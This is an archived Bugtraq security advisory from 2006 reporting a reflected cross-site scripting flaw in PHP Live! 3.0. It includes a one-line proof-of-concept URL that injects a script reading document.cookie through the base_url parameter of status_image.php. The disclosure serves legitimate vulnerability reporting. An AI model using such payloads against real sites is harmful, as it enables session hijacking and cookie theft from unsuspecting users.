PHP Live! XSS status_image.php

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP Live! XSS status_image.php
From: kspecial <kspecial@xxxxxxxxxxx>
Date: Wed, 22 Mar 2006 06:07:48 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mutt/1.5.9i

Date: 03/22/2006
Vendor: OSI Codes
Product: PHP Live!
Versions: tested 3.0
Vulnerability: Cross Site Scripting
Location: status_image.php
Exploit: 
/phplive/js/status_image.php?base_url=<script>alert(document.cookie)</script>

Stumbled across this while auditing a web server, vendor has been notified.

--K-sPecial

Prev by Date: Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0
Next by Date: IE crash
Previous by thread: [SECURITY] [DSA 1013-1] New snmptrapfmt packages fix insecure temporary file
Next by thread: IE crash
Index(es):
- Date
- Thread